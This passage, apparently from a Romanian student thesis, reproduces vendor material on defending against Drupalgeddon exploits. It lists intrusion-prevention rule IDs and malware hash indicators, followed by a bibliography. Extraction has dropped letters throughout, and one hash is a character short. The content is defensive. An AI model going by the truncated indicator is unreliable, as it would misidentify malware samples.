acest gen prin ap ararea ^ n profunzime: aplicarea principiului celor mai put ,in privilegiate
s,i ad augarea mai multor straturi de securitate, cum ar patch-urile virtuale, rewall-
urile, sistemele de detectare s ,i prevenire a intruziunilor, precum s ,i controlul aplicat ,iilor s ,i
monitorizarea comportamentului.
Solut ,ii Trend Micro
O abordare proactiv a, multistraticat a a securit at ,ii este cheia ^ mpotriva amenint , arilor
care exploateaz a vulnerabilit at ,ile – de la poarta de acces, punctele nale, ret ,elele s ,i ser-
verele. Trend Micro Deep Security s ,i protect ,ia ^ mpotriva vulnerabilit at ,ii Trend Micro
ofer a, de asemenea, patch-uri virtuale care protejeaz a serverele s ,i punctele nale de
amenint , arile care violeaz a vulnerabilit at ,ile ^ n aplicat ,ii sau site-uri critice, cum ar cele
care folosesc Drupal. Trend Micro , OceScan cu securitatea XGen pentru endpoint
are Protect ,ia Vulnerabilit at ,ii care protejeaz a puncte nale de vulnerabilit at ,ile identi-
cate s ,i necunoscute, chiar ^ nainte ca patch-urile s a e chiar implementate. Trend Micro
Smart Protection Suites s ,i Worry-Free Business Security protejeaz a utilizatorii s ,i
companiile de aceste amenint , ari prin detectarea s ,i blocarea s ,ierelor r au intent ,ionate s ,i a
tuturor adreselor URL malitioase conexe. Solut ,ia Trend Micro Smart Home Network
protejeaz a client ,ii prin intermediul acestor reguli DPI:
1134569 – Executarea execut ,iei codului de baz a Drupal pe baza WEB-ului WEB -1.1
(CVE-2018-7600)
1134571 – Executarea codului de formare Drupal pe baz a de WEB-ului WEB -1.2 (CVE-
2018-7600)
1134572 – Executarea execut ,iei codului de baz a Drupal pe baz a de WEB WEB-1.3.3
(CVE-2018-7600)
1134790 – WEB Drupal Core drupalgeddon3 Executarea codului de la distant , a autenti-
cat -2 (CVE-2018-7602)
Solut ,iile de protect ,ie ^ mpotriva vulnerabilit at ,ii Trend Micro Deep Security s ,i Trend Micro
41
protejeaz a sistemele utilizatorilor ^ mpotriva oric aror amenint , ari care pot viza vulnera-
bilit at ,ile ment ,ionate mai sus prin urm atoarea regul a DPI9:
1009054 – Vulnerabilitatea execut ,iei codului de la distant , a Drupal Core (CVE-2018-
7602)
Indicatori de compromis (IoC):
Ceasuri ^ nrudite (SHA-256):
Detectat ca "ELF_DLOADR.DHG":
a1d8bfc17bf395742e4c8a81ca0ba352b998c1590ac2fb014aa23671b2ee6302
01147a014378711ee299de7b37ac0a262a1ac22011a510bdf9ad0c93695827b
Detectat ca "COINMINER_TOOLXMR.O-ELF64":
89cdf303dc94e56dacc4e894d44c54845e4658a0dc5b32d50b0650a67f92d5b3
9Deep Packet Inspection
42
Bibliograe
1. "Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and
XSS Attacks". Fonseca, J.; Vieira, M.; Madeira, H., Dependable Computing, IEEE.
Dec 2007.
2. "2012 Trends Report: Application Security Risks". Cenzic, Inc. 11 March 2012.
Retrieved 9 July 2012.
3. "Latest OWASP Top 10 looks at APIs, web apps" Korolov, Maria (Apr 27, 2017).
4. "Systematic review of web application security development model". Shuaibu, Bala
Musa; Norwawi, Norita Md; Selamat, Mohd Hasan; Al-Alwani, Abdulkareem (2013-
01-17).
5. "Web application rewalls for security and regulatory compliance". TestingXperts
Blog. March 2017.
6. "Why It s Insane to Trust Static Analysis". Williams, Je (22 September 2015).
7. "Design & Research on Vulnerability Databases": Yun-Hua, G; Pei, L (2010).
8. "Common Vulnerability Scoring System". IEEE Security and Privacy Magazine.
Mell, P; Romanosky, S (2006).
9. "Generation of Sql-injection Free Secure Algorithm to Detect and Prevent Sql-
Injection Attacks". Procedia Technology. Natarajan, K; Subramani, S (2012).
10. "Vulnerability Database – Top 1000 Flaws". Network Security 2001.
11. "Continuous Security in a DevOps World=5 July 2016". RMLL Conference 2016.
Retrieved 4 July 2018
43
Copyright Notice
© Licențiada.org respectă drepturile de proprietate intelectuală și așteaptă ca toți utilizatorii să facă același lucru. Dacă consideri că un conținut de pe site încalcă drepturile tale de autor, te rugăm să trimiți o notificare DMCA.
Acest articol: Programul de studii: TEORIA COD ARII S I STOC ARII INFORMAT IEI [609846] (ID: 609846)
Dacă considerați că acest conținut vă încalcă drepturile de autor, vă rugăm să depuneți o cerere pe pagina noastră Copyright Takedown.
